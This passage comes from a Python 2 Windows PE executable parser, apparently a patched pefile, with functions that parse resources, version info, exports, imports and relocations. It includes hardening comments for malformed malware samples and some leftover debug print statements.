'RVA of IMAGE_BOUND_IMPORT_DESCRIPTOR points to an invalid address: %x' %
rva)
return
forwarder_refs = []
# 8 is the size of __IMAGE_BOUND_IMPORT_DESCRIPTOR_format__
for idx in xrange( min( bnd_descr.NumberOfModuleForwarderRefs, safety_boundary/8) ):
# Both structures IMAGE_BOUND_IMPORT_DESCRIPTOR and
# IMAGE_BOUND_FORWARDER_REF have the same size.
bnd_frwd_ref = self.__unpack_data__(
self.__IMAGE_BOUND_FORWARDER_REF_format__,
self.__data__[rva:rva+bnd_descr_size],
file_offset = rva)
# OC Patch:
if not bnd_frwd_ref:
raise PEFormatError(
"IMAGE_BOUND_FORWARDER_REF cannot be read")
rva += bnd_frwd_ref.sizeof()
offset = start+bnd_frwd_ref.OffsetModuleName
name_str = self.get_string_from_data(
0, self.__data__[offset : offset + MAX_STRING_LENGTH])
# OffsetModuleName points to a DLL name. These shouldn't be too long.
# Anything longer than a safety length of 128 will be taken to indicate
# a corrupt entry and abort the processing of these entries.
# Names shorted than 4 characters will be taken as invalid as well.
if name_str:
invalid_chars = [c for c in name_str if c not in string.printable]
if len(name_str) > 256 or len(name_str) < 4 or invalid_chars:
break
forwarder_refs.append(BoundImportRefData(
struct = bnd_frwd_ref,
name = name_str))
offset = start+bnd_descr.OffsetModuleName
name_str = self.get_string_from_data(
0, self.__data__[offset : offset + MAX_STRING_LENGTH])
if name_str:
invalid_chars = [c for c in name_str if c not in string.printable]
if len(name_str) > 256 or len(name_str) < 4 or invalid_chars:
break
if not name_str:
break
bound_imports.append(
BoundImportDescData(
struct = bnd_descr,
name = name_str,
entries = forwarder_refs))
return bound_imports
def parse_directory_tls(self, rva, size):
""""""
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
format = self.__IMAGE_TLS_DIRECTORY_format__
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
format = self.__IMAGE_TLS_DIRECTORY64_format__
try:
tls_struct = self.__unpack_data__(
format,
self.get_data( rva, Structure(format).sizeof() ),
file_offset = self.get_offset_from_rva(rva))
except PEFormatError:
self.__warnings.append(
'Invalid TLS information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
tls_struct = None
if not tls_struct:
return None
return TlsData( struct = tls_struct )
def parse_directory_load_config(self, rva, size):
""""""
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
format = self.__IMAGE_LOAD_CONFIG_DIRECTORY_format__
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
format = self.__IMAGE_LOAD_CONFIG_DIRECTORY64_format__
try:
load_config_struct = self.__unpack_data__(
format,
self.get_data( rva, Structure(format).sizeof() ),
file_offset = self.get_offset_from_rva(rva))
except PEFormatError:
self.__warnings.append(
'Invalid LOAD_CONFIG information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
load_config_struct = None
if not load_config_struct:
return None
return LoadConfigData( struct = load_config_struct )
def parse_relocations_directory(self, rva, size):
""""""
rlc_size = Structure(self.__IMAGE_BASE_RELOCATION_format__).sizeof()
end = rva+size
relocations = []
while rva < end:
# OC Patch:
# Malware that has bad RVA entries will cause an error.
# Just continue on after an exception
#
try:
rlc = self.__unpack_data__(
self.__IMAGE_BASE_RELOCATION_format__,
self.get_data(rva, rlc_size),
file_offset = self.get_offset_from_rva(rva) )
except PEFormatError:
self.__warnings.append(
'Invalid relocation information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
rlc = None
if not rlc:
break
# rlc.VirtualAddress must lie within the Image
if rlc.VirtualAddress > self.OPTIONAL_HEADER.SizeOfImage:
self.__warnings.append(
'Invalid relocation information. VirtualAddress outside' +
' of Image: 0x%x' % rlc.VirtualAddress)
break
# rlc.SizeOfBlock must be less or equal than the size of the image
# (It's a rather loose sanity test)
if rlc.SizeOfBlock > self.OPTIONAL_HEADER.SizeOfImage:
self.__warnings.append(
'Invalid relocation information. SizeOfBlock too large' +
': %d' % rlc.SizeOfBlock)
break
reloc_entries = self.parse_relocations(
rva+rlc_size, rlc.VirtualAddress, rlc.SizeOfBlock-rlc_size )
relocations.append(
BaseRelocationData(
struct = rlc,
entries = reloc_entries))
if not rlc.SizeOfBlock:
break
rva += rlc.SizeOfBlock
return relocations
def parse_relocations(self, data_rva, rva, size):
""""""
try:
data = self.get_data(data_rva, size)
file_offset = self.get_offset_from_rva(data_rva)
except PEFormatError, excp:
self.__warnings.append(
'Bad RVA in relocation data: 0x%x' % (data_rva))
return []
entries = []
offsets_and_type = []
for idx in xrange( len(data) / 2 ):
entry = self.__unpack_data__(
self.__IMAGE_BASE_RELOCATION_ENTRY_format__,
data[idx*2:(idx+1)*2],
file_offset = file_offset )
if not entry:
break
word = entry.Data
reloc_type = (word>>12)
reloc_offset = (word & 0x0fff)
if (reloc_offset, reloc_type) in offsets_and_type:
self.__warnings.append(
'Overlapping offsets in relocation data ' +
'data at RVA: 0x%x' % (reloc_offset+rva))
break
if len(offsets_and_type) >= 1000:
offsets_and_type.pop()
offsets_and_type.insert(0, (reloc_offset, reloc_type))
entries.append(
RelocationData(
struct = entry,
type = reloc_type,
base_rva = rva,
rva = reloc_offset+rva))
file_offset += entry.sizeof()
return entries
def parse_debug_directory(self, rva, size):
""""""
dbg_size = Structure(self.__IMAGE_DEBUG_DIRECTORY_format__).sizeof()
debug = []
for idx in xrange(size/dbg_size):
try:
data = self.get_data(rva+dbg_size*idx, dbg_size)
except PEFormatError, e:
self.__warnings.append(
'Invalid debug information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
return None
dbg = self.__unpack_data__(
self.__IMAGE_DEBUG_DIRECTORY_format__,
data, file_offset = self.get_offset_from_rva(rva+dbg_size*idx))
if not dbg:
return None
debug.append(
DebugData(
struct = dbg))
return debug
def parse_resources_directory(self, rva, size=0, base_rva = None, level = 0, dirs=None):
"""Parse the resources directory.
Given the RVA of the resources directory, it will process all
its entries.
The root will have the corresponding member of its structure,
IMAGE_RESOURCE_DIRECTORY plus 'entries', a list of all the
entries in the directory.
Those entries will have, correspondingly, all the structure's
members (IMAGE_RESOURCE_DIRECTORY_ENTRY) and an additional one,
"directory", pointing to the IMAGE_RESOURCE_DIRECTORY structure
representing upper layers of the tree. This one will also have
an 'entries' attribute, pointing to the 3rd, and last, level.
Another directory with more entries. Those last entries will
have a new attribute (both 'leaf' or 'data_entry' can be used to
access it). This structure finally points to the resource data.
All the members of this structure, IMAGE_RESOURCE_DATA_ENTRY,
are available as its attributes.
"""
# OC Patch:
if dirs is None:
dirs = [rva]
if base_rva is None:
base_rva = rva
resources_section = self.get_section_by_rva(rva)
try:
# If the RVA is invalid all would blow up. Some EXEs seem to be
# specially nasty and have an invalid RVA.
data = self.get_data(rva, Structure(self.__IMAGE_RESOURCE_DIRECTORY_format__).sizeof() )
except PEFormatError, e:
self.__warnings.append(
'Invalid resources directory. Can\'t read ' +
'directory data at RVA: 0x%x' % rva)
return None
# Get the resource directory structure, that is, the header
# of the table preceding the actual entries
#
resource_dir = self.__unpack_data__(
self.__IMAGE_RESOURCE_DIRECTORY_format__, data,
file_offset = self.get_offset_from_rva(rva) )
if resource_dir is None:
# If can't parse resources directory then silently return.
# This directory does not necessarily have to be valid to
# still have a valid PE file
self.__warnings.append(
'Invalid resources directory. Can\'t parse ' +
'directory data at RVA: 0x%x' % rva)
return None
dir_entries = []
# Advance the RVA to the position immediately following the directory
# table header and pointing to the first entry in the table
#
rva += resource_dir.sizeof()
number_of_entries = (
resource_dir.NumberOfNamedEntries +
resource_dir.NumberOfIdEntries )
# Set a hard limit on the maximum reasonable number of entries
MAX_ALLOWED_ENTRIES = 4096
if number_of_entries > MAX_ALLOWED_ENTRIES:
self.__warnings.append(
'Error parsing the resources directory. '
'The directory contains %d entries (>%s)' %
(number_of_entries, MAX_ALLOWED_ENTRIES) )
return None
strings_to_postprocess = list()
# Keep track of the last name's start and end offsets in order
# to be able to detect overlapping entries that might suggest
# and invalid or corrupt directory.
last_name_begin_end = None
for idx in xrange(number_of_entries):
res = self.parse_resource_entry(rva)
if res is None:
self.__warnings.append(
'Error parsing the resources directory, '
'Entry %d is invalid, RVA = 0x%x. ' %
(idx, rva) )
break
entry_name = None
entry_id = None
name_is_string = (res.Name & 0x80000000L) >> 31
if not name_is_string:
entry_id = res.Name
else:
ustr_offset = base_rva+res.NameOffset
try:
entry_name = UnicodeStringWrapperPostProcessor(self, ustr_offset)
# If the last entry's offset points before the current's but its end
# is past the current's beginning, assume the overlap indicates a
# corrupt name.
if last_name_begin_end and (last_name_begin_end[0] < ustr_offset and
last_name_begin_end[1] >= ustr_offset):
# Remove the previous overlapping entry as it's likely to be already corrupt data.
strings_to_postprocess.pop()
self.__warnings.append(
'Error parsing the resources directory, '
'attempting to read entry name. '
'Entry names overlap 0x%x' %
(ustr_offset) )
break
last_name_begin_end = (ustr_offset, ustr_offset+entry_name.get_pascal_16_length())
strings_to_postprocess.append(entry_name)
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the resources directory, '
'attempting to read entry name. '
'Can\'t read unicode string at offset 0x%x' %
(ustr_offset) )
if res.DataIsDirectory:
# OC Patch:
#
# One trick malware can do is to recursively reference
# the next directory. This causes hilarity to ensue when
# trying to parse everything correctly.
# If the original RVA given to this function is equal to
# the next one to parse, we assume that it's a trick.
# Instead of raising a PEFormatError this would skip some
# reasonable data so we just break.
#
# 9ee4d0a0caf095314fd7041a3e4404dc is the offending sample
if (base_rva + res.OffsetToDirectory) in dirs:
break
else:
entry_directory = self.parse_resources_directory(
base_rva+res.OffsetToDirectory,
size-(rva-base_rva), # size
base_rva=base_rva, level = level+1,
dirs=dirs + [base_rva + res.OffsetToDirectory])
if not entry_directory:
break
# Ange Albertini's code to process resources' strings
#
strings = None
if entry_id == RESOURCE_TYPE['RT_STRING']:
strings = dict()
for resource_id in entry_directory.entries:
if hasattr(resource_id, 'directory'):
resource_strings = dict()
for resource_lang in resource_id.directory.entries:
if (resource_lang is None or not hasattr(resource_lang, 'data') or
resource_lang.data.struct.Size is None or resource_id.id is None):
continue
string_entry_rva = resource_lang.data.struct.OffsetToData
string_entry_size = resource_lang.data.struct.Size
string_entry_id = resource_id.id
string_entry_data = self.get_data(string_entry_rva, string_entry_size)
parse_strings( string_entry_data, (int(string_entry_id) - 1) * 16, resource_strings )
strings.update(resource_strings)
resource_id.directory.strings = resource_strings
dir_entries.append(
ResourceDirEntryData(
struct = res,
name = entry_name,
id = entry_id,
directory = entry_directory))
else:
struct = self.parse_resource_data_entry(
base_rva + res.OffsetToDirectory)
if struct:
entry_data = ResourceDataEntryData(
struct = struct,
lang = res.Name & 0x3ff,
sublang = res.Name >> 10 )
dir_entries.append(
ResourceDirEntryData(
struct = res,
name = entry_name,
id = entry_id,
data = entry_data))
else:
break
# Check if this entry contains version information
#
if level == 0 and res.Id == RESOURCE_TYPE['RT_VERSION']:
if len(dir_entries)>0:
last_entry = dir_entries[-1]
rt_version_struct = None
try:
rt_version_struct = last_entry.directory.entries[0].directory.entries[0].data.struct
except:
# Maybe a malformed directory structure...?
# Lets ignore it
pass
if rt_version_struct is not None:
self.parse_version_information(rt_version_struct)
rva += res.sizeof()
string_rvas = [s.get_rva() for s in strings_to_postprocess]
string_rvas.sort()
for idx, s in enumerate(strings_to_postprocess):
s.render_pascal_16()
resource_directory_data = ResourceDirData(
struct = resource_dir,
entries = dir_entries)
return resource_directory_data
def parse_resource_data_entry(self, rva):
"""Parse a data entry from the resources directory."""
try:
# If the RVA is invalid all would blow up. Some EXEs seem to be
# specially nasty and have an invalid RVA.
data = self.get_data(rva, Structure(self.__IMAGE_RESOURCE_DATA_ENTRY_format__).sizeof() )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing a resource directory data entry, ' +
'the RVA is invalid: 0x%x' % ( rva ) )
return None
data_entry = self.__unpack_data__(
self.__IMAGE_RESOURCE_DATA_ENTRY_format__, data,
file_offset = self.get_offset_from_rva(rva) )
return data_entry
def parse_resource_entry(self, rva):
"""Parse a directory entry from the resources directory."""
try:
data = self.get_data( rva, Structure(self.__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__).sizeof() )
except PEFormatError, excp:
# A warning will be added by the caller if this method returns None
return None
resource = self.__unpack_data__(
self.__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__, data,
file_offset = self.get_offset_from_rva(rva) )
if resource is None:
return None
#resource.NameIsString = (resource.Name & 0x80000000L) >> 31
resource.NameOffset = resource.Name & 0x7FFFFFFFL
resource.__pad = resource.Name & 0xFFFF0000L
resource.Id = resource.Name & 0x0000FFFFL
resource.DataIsDirectory = (resource.OffsetToData & 0x80000000L) >> 31
resource.OffsetToDirectory = resource.OffsetToData & 0x7FFFFFFFL
return resource
def parse_version_information(self, version_struct):
"""Parse version information structure.
The date will be made available in three attributes of the PE object.
VS_VERSIONINFO will contain the first three fields of the main structure:
'Length', 'ValueLength', and 'Type'
VS_FIXEDFILEINFO will hold the rest of the fields, accessible as sub-attributes:
'Signature', 'StrucVersion', 'FileVersionMS', 'FileVersionLS',
'ProductVersionMS', 'ProductVersionLS', 'FileFlagsMask', 'FileFlags',
'FileOS', 'FileType', 'FileSubtype', 'FileDateMS', 'FileDateLS'
FileInfo is a list of all StringFileInfo and VarFileInfo structures.
StringFileInfo structures will have a list as an attribute named 'StringTable'
containing all the StringTable structures. Each of those structures contains a
dictionary 'entries' with all the key / value version information string pairs.
VarFileInfo structures will have a list as an attribute named 'Var' containing
all Var structures. Each Var structure will have a dictionary as an attribute
named 'entry' which will contain the name and value of the Var.
"""
# Retrieve the data for the version info resource
#
start_offset = self.get_offset_from_rva( version_struct.OffsetToData )
raw_data = self.__data__[ start_offset : start_offset+version_struct.Size ]
# Map the main structure and the subsequent string
#
versioninfo_struct = self.__unpack_data__(
self.__VS_VERSIONINFO_format__, raw_data,
file_offset = start_offset )
if versioninfo_struct is None:
return
ustr_offset = version_struct.OffsetToData + versioninfo_struct.sizeof()
try:
versioninfo_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read VS_VERSION_INFO string. Can\'t ' +
'read unicode string at offset 0x%x' % (
ustr_offset ) )
versioninfo_string = None
# If the structure does not contain the expected name, it's assumed to be invalid
#
if versioninfo_string != u'VS_VERSION_INFO':
self.__warnings.append('Invalid VS_VERSION_INFO block')
return
# Set the PE object's VS_VERSIONINFO to this one
#
self.VS_VERSIONINFO = versioninfo_struct
# The the Key attribute to point to the unicode string identifying the structure
#
self.VS_VERSIONINFO.Key = versioninfo_string
# Process the fixed version information, get the offset and structure
#
fixedfileinfo_offset = self.dword_align(
versioninfo_struct.sizeof() + 2 * (len(versioninfo_string) + 1),
version_struct.OffsetToData)
fixedfileinfo_struct = self.__unpack_data__(
self.__VS_FIXEDFILEINFO_format__,
raw_data[fixedfileinfo_offset:],
file_offset = start_offset+fixedfileinfo_offset )
if not fixedfileinfo_struct:
return
# Set the PE object's VS_FIXEDFILEINFO to this one
#
self.VS_FIXEDFILEINFO = fixedfileinfo_struct
# Start parsing all the StringFileInfo and VarFileInfo structures
#
# Get the first one
#
stringfileinfo_offset = self.dword_align(
fixedfileinfo_offset + fixedfileinfo_struct.sizeof(),
version_struct.OffsetToData)
original_stringfileinfo_offset = stringfileinfo_offset
# Set the PE object's attribute that will contain them all.
#
self.FileInfo = list()
while True:
# Process the StringFileInfo/VarFileInfo structure
#
stringfileinfo_struct = self.__unpack_data__(
self.__StringFileInfo_format__,
raw_data[stringfileinfo_offset:],
file_offset = start_offset+stringfileinfo_offset )
if stringfileinfo_struct is None:
self.__warnings.append(
'Error parsing StringFileInfo/VarFileInfo struct' )
return None
# Get the subsequent string defining the structure.
#
ustr_offset = ( version_struct.OffsetToData +
stringfileinfo_offset + versioninfo_struct.sizeof() )
try:
stringfileinfo_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringFileInfo string. Can\'t ' +
'read unicode string at offset 0x%x' % ( ustr_offset ) )
break
# Set such string as the Key attribute
#
stringfileinfo_struct.Key = stringfileinfo_string
# Append the structure to the PE object's list
#
self.FileInfo.append(stringfileinfo_struct)
# Parse a StringFileInfo entry
#
if stringfileinfo_string and stringfileinfo_string.startswith(u'StringFileInfo'):
if stringfileinfo_struct.Type in (0,1) and stringfileinfo_struct.ValueLength == 0:
stringtable_offset = self.dword_align(
stringfileinfo_offset + stringfileinfo_struct.sizeof() +
2*(len(stringfileinfo_string)+1),
version_struct.OffsetToData)
stringfileinfo_struct.StringTable = list()
# Process the String Table entries
#
while True:
stringtable_struct = self.__unpack_data__(
self.__StringTable_format__,
raw_data[stringtable_offset:],
file_offset = start_offset+stringtable_offset )
if not stringtable_struct:
break
ustr_offset = ( version_struct.OffsetToData + stringtable_offset +
stringtable_struct.sizeof() )
try:
stringtable_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringTable string. Can\'t ' +
'read unicode string at offset 0x%x' % ( ustr_offset ) )
break
stringtable_struct.LangID = stringtable_string
stringtable_struct.entries = dict()
stringtable_struct.entries_offsets = dict()
stringtable_struct.entries_lengths = dict()
stringfileinfo_struct.StringTable.append(stringtable_struct)
entry_offset = self.dword_align(
stringtable_offset + stringtable_struct.sizeof() +
2*(len(stringtable_string)+1),
version_struct.OffsetToData)
# Process all entries in the string table
#
while entry_offset < stringtable_offset + stringtable_struct.Length:
string_struct = self.__unpack_data__(
self.__String_format__, raw_data[entry_offset:],
file_offset = start_offset+entry_offset )
if not string_struct:
break
ustr_offset = ( version_struct.OffsetToData + entry_offset +
string_struct.sizeof() )
try:
key = self.get_string_u_at_rva( ustr_offset )
key_offset = self.get_offset_from_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringTable Key string. Can\'t ' +
'read unicode string at offset 0x%x' % ( ustr_offset ) )
break
value_offset = self.dword_align(
2*(len(key)+1) + entry_offset + string_struct.sizeof(),
version_struct.OffsetToData)
ustr_offset = version_struct.OffsetToData + value_offset
try:
value = self.get_string_u_at_rva( ustr_offset,
max_length = string_struct.ValueLength )
value_offset = self.get_offset_from_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringTable Value string. ' +
'Can\'t read unicode string at offset 0x%x' % (
ustr_offset ) )
break
if string_struct.Length == 0:
entry_offset = stringtable_offset + stringtable_struct.Length
else:
entry_offset = self.dword_align(
string_struct.Length+entry_offset, version_struct.OffsetToData)
key_as_char = []
for c in key:
if ord(c) >= 0x80:
key_as_char.append('\\x%02x' % ord(c))
else:
key_as_char.append(c)
key_as_char = ''.join(key_as_char)
stringtable_struct.entries[key] = value
stringtable_struct.entries_offsets[key] = (key_offset, value_offset)
stringtable_struct.entries_lengths[key] = (len(key), len(value))
new_stringtable_offset = self.dword_align(
stringtable_struct.Length + stringtable_offset,
version_struct.OffsetToData)
# check if the entry is crafted in a way that would lead to an infinite
# loop and break if so
#
if new_stringtable_offset == stringtable_offset:
break
stringtable_offset = new_stringtable_offset
if stringtable_offset >= stringfileinfo_struct.Length:
break
# Parse a VarFileInfo entry
#
elif stringfileinfo_string and stringfileinfo_string.startswith( u'VarFileInfo' ):
varfileinfo_struct = stringfileinfo_struct
varfileinfo_struct.name = 'VarFileInfo'
if varfileinfo_struct.Type in (0, 1) and varfileinfo_struct.ValueLength == 0:
var_offset = self.dword_align(
stringfileinfo_offset + varfileinfo_struct.sizeof() +
2*(len(stringfileinfo_string)+1),
version_struct.OffsetToData)
varfileinfo_struct.Var = list()
# Process all entries
#
while True:
var_struct = self.__unpack_data__(
self.__Var_format__,
raw_data[var_offset:],
file_offset = start_offset+var_offset )
if not var_struct:
break
ustr_offset = ( version_struct.OffsetToData + var_offset +
var_struct.sizeof() )
try:
var_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read VarFileInfo Var string. ' +
'Can\'t read unicode string at offset 0x%x' % (ustr_offset))
break
if var_string is None:
break
varfileinfo_struct.Var.append(var_struct)
varword_offset = self.dword_align(
2*(len(var_string)+1) + var_offset + var_struct.sizeof(),
version_struct.OffsetToData)
orig_varword_offset = varword_offset
while varword_offset < orig_varword_offset + var_struct.ValueLength:
word1 = self.get_word_from_data(
raw_data[varword_offset:varword_offset+2], 0)
word2 = self.get_word_from_data(
raw_data[varword_offset+2:varword_offset+4], 0)
varword_offset += 4
if isinstance(word1, (int, long)) and isinstance(word2, (int, long)):
var_struct.entry = {var_string: '0x%04x 0x%04x' % (word1, word2)}
var_offset = self.dword_align(
var_offset+var_struct.Length, version_struct.OffsetToData)
if var_offset <= var_offset+var_struct.Length:
break
# Increment and align the offset
#
stringfileinfo_offset = self.dword_align(
stringfileinfo_struct.Length+stringfileinfo_offset,
version_struct.OffsetToData)
# Check if all the StringFileInfo and VarFileInfo items have been processed
#
if stringfileinfo_struct.Length == 0 or stringfileinfo_offset >= versioninfo_struct.Length:
break
def parse_export_directory(self, rva, size):
"""Parse the export directory.
Given the RVA of the export directory, it will process all
its entries.
The exports will be made available as a list of ExportData
instances in the 'IMAGE_DIRECTORY_ENTRY_EXPORT' PE attribute.
"""
try:
export_dir = self.__unpack_data__(
self.__IMAGE_EXPORT_DIRECTORY_format__,
self.get_data( rva, Structure(self.__IMAGE_EXPORT_DIRECTORY_format__).sizeof() ),
file_offset = self.get_offset_from_rva(rva) )
except PEFormatError:
self.__warnings.append(
'Error parsing export directory at RVA: 0x%x' % ( rva ) )
return
if not export_dir:
return
# We keep track of the bytes left in the file and use it to set a upper
# bound in the number of items that can be read from the different
# arrays
#
def length_until_eof(rva):
return len(self.__data__) - self.get_offset_from_rva(rva)
print export_dir
try:
address_of_names = self.get_data(
export_dir.AddressOfNames, min( length_until_eof(export_dir.AddressOfNames), export_dir.NumberOfNames*4))
address_of_name_ordinals = self.get_data(
export_dir.AddressOfNameOrdinals, min( length_until_eof(export_dir.AddressOfNameOrdinals), export_dir.NumberOfNames*4) )
address_of_functions = self.get_data(
export_dir.AddressOfFunctions, min( length_until_eof(export_dir.AddressOfFunctions), export_dir.NumberOfFunctions*4) )
except PEFormatError:
self.__warnings.append(
'Error parsing export directory at RVA: 0x%x' % ( rva ) )
return
exports = []
max_failed_entries_before_giving_up = 10
section = self.get_section_by_rva(export_dir.AddressOfNames)
if not section:
self.__warnings.append(
'RVA AddressOfNames in the export directory points to an invalid address: %x' %
export_dir.AddressOfNames)
return
else:
safety_boundary = section.VirtualAddress + len(section.get_data()) - export_dir.AddressOfNames
print "Safety boundary %x, num names %d" % (safety_boundary, min( export_dir.NumberOfNames, safety_boundary/4))
for i in xrange( min( export_dir.NumberOfNames, safety_boundary/4) ):
symbol_name_address = self.get_dword_from_data(address_of_names, i)
if symbol_name_address is None:
max_failed_entries_before_giving_up -= 1
if max_failed_entries_before_giving_up <= 0:
break
symbol_name = self.get_string_at_rva( symbol_name_address )
if not is_valid_function_name(symbol_name):
break
print symbol_name
try:
symbol_name_offset = self.get_offset_from_rva( symbol_name_address )
except PEFormatError:
max_failed_entries_before_giving_up -= 1
if max_failed_entries_before_giving_up <= 0:
break
continue
symbol_ordinal = self.get_word_from_data(
address_of_name_ordinals, i)
if symbol_ordinal is not None and symbol_ordinal*4 < len(address_of_functions):
symbol_address = self.get_dword_from_data(
address_of_functions, symbol_ordinal)
else:
# Corrupt? a bad pointer... we assume it's all
# useless, no exports
return None
if symbol_address is None or symbol_address == 0:
continue
# If the function's RVA points within the export directory
# it will point to a string with the forwarded symbol's string
# instead of pointing the the function start address.
if symbol_address >= rva and symbol_address < rva+size:
forwarder_str = self.get_string_at_rva(symbol_address)
try:
forwarder_offset = self.get_offset_from_rva( symbol_address )
except PEFormatError:
continue
else:
forwarder_str = None
forwarder_offset = None
exports.append(
ExportData(
pe = self,
ordinal = export_dir.Base+symbol_ordinal,
ordinal_offset = self.get_offset_from_rva( export_dir.AddressOfNameOrdinals + 2*i ),
address = symbol_address,
address_offset = self.get_offset_from_rva( export_dir.AddressOfFunctions + 4*symbol_ordinal ),
name = symbol_name,
name_offset = symbol_name_offset,
forwarder = forwarder_str,
forwarder_offset = forwarder_offset ))
ordinals = [exp.ordinal for exp in exports]
max_failed_entries_before_giving_up = 10
section = self.get_section_by_rva(export_dir.AddressOfFunctions)
if not section:
self.__warnings.append(
'RVA AddressOfFunctions in the export directory points to an invalid address: %x' %
export_dir.AddressOfFunctions)
return
safety_boundary = section.VirtualAddress + len(section.get_data()) - export_dir.AddressOfFunctions
print "Safety2 boundary %x, num names %d" % (safety_boundary, min( export_dir.NumberOfNames, safety_boundary/4))
for idx in xrange( min(export_dir.NumberOfFunctions, safety_boundary/4) ):
if not idx+export_dir.Base in ordinals:
try:
symbol_address = self.get_dword_from_data(
address_of_functions, idx)
except PEFormatError:
symbol_address = None
if symbol_address is None:
max_failed_entries_before_giving_up -= 1
if max_failed_entries_before_giving_up <= 0:
break
if symbol_address == 0:
continue
#
# Checking for forwarder again.
#
if symbol_address >= rva and symbol_address < rva+size:
forwarder_str = self.get_string_at_rva(symbol_address)
else:
forwarder_str = None
exports.append(
ExportData(
ordinal = export_dir.Base+idx,
address = symbol_address,
name = None,
forwarder = forwarder_str))
return ExportDirData(
struct = export_dir,
symbols = exports)
def dword_align(self, offset, base):
return ((offset+base+3) & 0xfffffffcL) - (base & 0xfffffffcL)
def parse_delay_import_directory(self, rva, size):
"""Walk and parse the delay import directory."""
import_descs = []
while True:
try:
# If the RVA is invalid all would blow up. Some PEs seem to be
# specially nasty and have an invalid RVA.
data = self.get_data( rva, Structure(self.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__).sizeof() )
except PEFormatError, e:
self.__warnings.append(
'Error parsing the Delay import directory at RVA: 0x%x' % ( rva ) )
break
file_offset = self.get_offset_from_rva(rva)
import_desc = self.__unpack_data__(
self.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__,
data, file_offset = file_offset )
# If the structure is all zeros, we reached the end of the list
if not import_desc or import_desc.all_zeroes():
break
rva += import_desc.sizeof()
# If the array of thunk's is somewhere earlier than the import
# descriptor we can set a maximum length for the array. Otherwise
# just set a maximum length of the size of the file
max_len = len(self.__data__) - file_offset
if rva > import_desc.pINT or rva > import_desc.pIAT:
max_len = max(rva-import_desc.pINT, rva-import_desc.pIAT)
try:
import_data = self.parse_imports(
import_desc.pINT,
import_desc.pIAT,
None,
max_length = max_len)
except PEFormatError, e:
self.__warnings.append(
'Error parsing the Delay import directory. ' +
'Invalid import data at RVA: 0x%x (%s)' % ( rva, e.value) )
break
if not import_data:
continue
dll = self.get_string_at_rva(import_desc.szName)
if not is_valid_dos_filename(dll):
dll = '*invalid*'
if dll:
for symbol in import_data:
if symbol.name is None:
funcname = ordlookup.ordLookup(dll.lower(), symbol.ordinal)
if funcname:
symbol.name = funcname
import_descs.append(
ImportDescData(
struct = import_desc,
imports = import_data,
dll = dll))
return import_descs
def get_imphash(self):
impstrs = []
exts = ['ocx', 'sys', 'dll']
if not hasattr(self, "DIRECTORY_ENTRY_IMPORT"):
return ""
for entry in self.DIRECTORY_ENTRY_IMPORT:
libname = entry.dll.lower()
parts = libname.rsplit('.', 1)
if len(parts) > 1 and parts[1] in exts:
libname = parts[0]
for imp in entry.imports:
funcname = None
if not imp.name:
funcname = ordlookup.ordLookup(entry.dll.lower(), imp.ordinal, make_name=True)
if not funcname:
raise Exception("Unable to look up ordinal %s:%04x" % (entry.dll, imp.ordinal))
else:
funcname = imp.name
if not funcname:
continue
impstrs.append('%s.%s' % (libname.lower(),funcname.lower()))
return hashlib.md5( ','.join( impstrs ) ).hexdigest()
def parse_import_directory(self, rva, size):
"""Walk and parse the import directory."""
import_descs = []
while True:
try:
# If the RVA is invalid all would blow up. Some EXEs seem to be
# specially nasty and have an invalid RVA.
data = self.get_data(rva, Structure(self.__IMAGE_IMPORT_DESCRIPTOR_format__).sizeof() )
except PEFormatError, e:
self.__warnings.append(
'Error parsing the import directory at RVA: 0x%x' % ( rva ) )
break
file_offset = self.get_offset_from_rva(rva)
import_desc = self.__unpack_data__(
self.__IMAGE_IMPORT_DESCRIPTOR_format__,
data, file_offset = file_offset )
# If the structure is all zeros, we reached the end of the list
if not import_desc or import_desc.all_zeroes():
break
rva += import_desc.sizeof()
# If the array of thunk's is somewhere earlier than the import
# descriptor we can set a maximum length for the array. Otherwise
# just set a maximum length of the size of the file
max_len = len(self.__data__) - file_offset
if rva > import_desc.OriginalFirstThunk or rva > import_desc.FirstThunk:
max_len = max(rva-import_desc.OriginalFirstThunk, rva-import_desc.FirstThunk)
try:
import_data = self.parse_imports(
import_desc.OriginalFirstThunk,
import_desc.FirstThunk,
import_desc.ForwarderChain,
max_length = max_len)
except PEFormatError, e:
self.__warnings.append(
'Error parsing the import directory. ' +
'Invalid Import data at RVA: 0x%x (%s)' % ( rva, e.value ) )
break
if not import_data:
continue
dll = self.get_string_at_rva(import_desc.Name)
if not is_valid_dos_filename(dll):
dll = '*invalid*'
if dll:
for symbol in import_data:
if symbol.name is None:
funcname = ordlookup.ordLookup(dll.lower(), symbol.ordinal)
if funcname:
symbol.name = funcname
import_descs.append(
ImportDescData(
struct = import_desc,
imports = import_data,
dll = dll))
suspicious_imports = set([ 'LoadLibrary', 'GetProcAddress' ])
suspicious_imports_count = 0
total_symbols = 0
for imp_dll in import_descs:
for symbol in imp_dll.imports:
for suspicious_symbol in suspicious_imports:
if symbol and symbol.name and symbol.name.startswith( suspicious_symbol ):
suspicious_imports_count += 1
break
total_symbols += 1
